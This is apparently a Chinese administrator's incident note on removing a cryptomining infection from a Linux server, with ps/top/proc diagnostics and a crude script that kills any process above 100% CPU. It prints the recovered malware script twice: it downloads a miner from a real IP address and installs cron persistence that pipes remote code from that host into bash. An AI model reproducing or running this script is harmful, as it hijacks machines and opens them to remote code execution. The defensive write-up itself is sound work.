今天top后发现一个进程CPU高1795%,判断是病毒
查找进程ps -elf|grep 进程id
pid和ppid查找到sleep进程
ps -ef|grep 4277
查看具体进程内容,ll /proc/进程id
pid
ll /proc/4277
ls -l /proc/{pid号}
ls -l /proc/{pid号}/exe
kill掉病毒进程
排查病毒代码位置
排查 www用户执行所有进程
ps -ef|grep www 发现
36239 www 20 0 76272 4976 452 S 0.3 0.0 174:24.97 .image.jpg
/tmp/.image.jpg (deleted)
www 202401 0.0 0.0 113292 1516 ? S 07:01 0:00 /var/tmp/.x/secure -c
www 248458 1 0 08:01 ? 00:00:00 /var/tmp/.x/secure -c
www 3241 0.1 0.0 113724 1836 ? S 4月01 151:10 /bin/sh ./php
www 3243 0.1 0.0 113724 1844 ? S 4月01 151:49 /bin/sh ./php
/proc/3243/exe -> /usr/bin/bash/tmp/.XIM-unix/admin/.sftp (deleted)
/tmp/.XIM-unix/admin/.sftp (deleted)
exe -> /usr/bin/bash#!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ ?link1="http://95.214.24.102:6972/xrx/xrx" ?link2="http://95.214.24.102:6972/configs/config-xrx.json" ?mkdir /var/tmp/.xrx ?cd /var/tmp/.xrx/ ?chattr -ia /var/tmp/.xrx/xrx ?chattr -ia /var/tmp/.xrx/config.json ?rm -rf /var/tmp/.xrx/xrx ?rm -rf /var/tmp/.xrx/config.json ?curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate ?curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate ?mv config-xrx.json config.json ?chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( $EUID != 0 )); then ?if ! crontab -l | grep -q 'secure'; then ?cd /dev/shm ?rm -rf /dev/shm/.spark ?echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?echo "*/30 * * * * curl 95.214.24.102:1011/next | bash " >> .spark ?crontab .spark ?sleep 2 ?rm -rf /dev/shm/.spark ?fi fi if (( $EUID == 0 )); then ?if ! cat /etc/crontab | grep -q 'secure'; then ?echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab ?echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?echo "*/30 * * * * root curl 95.214.24.102:1011/next | bash " >> /etc/crontab ?fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then ?echo "miner intact" ?else ?echo "miner not found,downloading..." ?downloadminer fi if [[ "$fsiz" -gt 0 ]]; then ?echo "miner size intact" ?else ?echo "filesize 0,downloading..." ?downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z "$ifrunning" ; then ?echo "xrx not running,starting..." ?/var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 ?sleep 1 ?echo -e "pid:" ?pgrep xrx fi /var/tmp/.x/secure
发现病毒文件
www 248458 1 0 08:01 ? 00:00:00 /var/tmp/.x/secure -c
16393 www 20 0 107740 73912 4 S 0.3 0.0 0:03.88 sh
/tmp/.XIM-unix/admin/sh (deleted)
#!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ ?
link1="http://95.214.24.102:6972/xrx/xrx" ?
link2="http://95.214.24.102:6972/configs/config-xrx.json" ?mkdir /var/tmp/.xrx ?
cd /var/tmp/.xrx/ ?
chattr -ia /var/tmp/.xrx/xrx ?
chattr -ia /var/tmp/.xrx/config.json ?
rm -rf /var/tmp/.xrx/xrx ?
rm -rf /var/tmp/.xrx/config.json ?
curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate ?
curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate ?
mv config-xrx.json config.json ?chmod +x /var/tmp/.xrx/xrx }######################## ########################
crontablegend(){ if (( $EUID != 0 )); then ?
if ! crontab -l | grep -q 'secure'; then ?
cd /dev/shm ?
rm -rf /dev/shm/.spark ?
echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?
sleep 1 ?
echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?
echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?
echo "*/30 * * * * curl 95.214.24.102:1011/next | bash " >> .spark ?crontab .spark ?
sleep 2 ?rm -rf /dev/shm/.spark ?fi fi if (( $EUID == 0 )); then ?
if ! cat /etc/crontab | grep -q 'secure'; then ?
echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?
echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab ?
echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?
echo "*/30 * * * * root curl 95.214.24.102:1011/next | bash " >> /etc/crontab ?fi fi }######################## ########################
gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then ?
echo "miner intact" ?else ?echo "miner not found,downloading..." ?
downloadminer fi if [[ "$fsiz" -gt 0 ]]; then ?echo "miner size intact" ?else ?
echo "filesize 0,downloading..." ?downloadminer fi }
######################## ########################
gettingmineru crontablegend if test -z "$ifrunning" ; then ?echo "xrx not running,starting..." ?
/var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 ?sleep 1 ?echo -e "pid:" ?pgrep xrx fi /var/tmp/.x/secure
查找进程ps -elf|grep 进程id
pid和ppid查找到sleep进程
病毒执行代码
#!/bin/bash
cd -- /tmp/.XIM-unix/admin
cp -f -- .sh sh
./sh -c >/dev/null 2>&1
./.php -c >/dev/null 2>&1
rm -rf sh
删除病毒代码
rm -rf admin
----------------------------------------------------------------------------------------
解决 linux top cpu超100 kill 脚本
在Linux系统中,top
命令是一个常用的性能分析工具,它可以实时显示系统的进程信息。如果您希望监控CPU使用率超过100%的进程,并在发现时杀死这些进程,可以编写一个简单的脚本来实现这个功能。
以下是一个简单的Bash脚本示例,它会定期运行top
命令,并在发现CPU使用率超过100%的情况下杀死相应的进程:
#!/bin/bash# 定义一个函数来检查CPU使用率并杀死进程
check_kill_process() {top_output=$(top -b -n 1 | grep "R" | awk '{if($9 > 100.0) print $1}')for pid in $top_output; dokill -9 $pid 2>/dev/nullecho "Killed PID $pid because its CPU usage is greater than 100%"done
}# 主循环,每隔一定时间运行检查函数
while true; docheck_kill_processsleep 5 # 每隔5秒检查一次
done
请注意,该脚本使用了top
命令的-b
(批处理模式)和-n
(指定循环次数)选项,以及管道(|
)和grep
、awk
等命令来分析和处理输出。脚本会无限循环地运行,每5秒检查一次系统进程的CPU使用情况,并在发现CPU使用率超过100%时杀死相应的进程。
在运行这个脚本之前,请确保您对其中使用的命令和行为有足够的了解,并且已经考虑到了可能对系统稳定性造成的影响。此外,这个脚本应该在有足够权限的用户下运行,通常是root用户。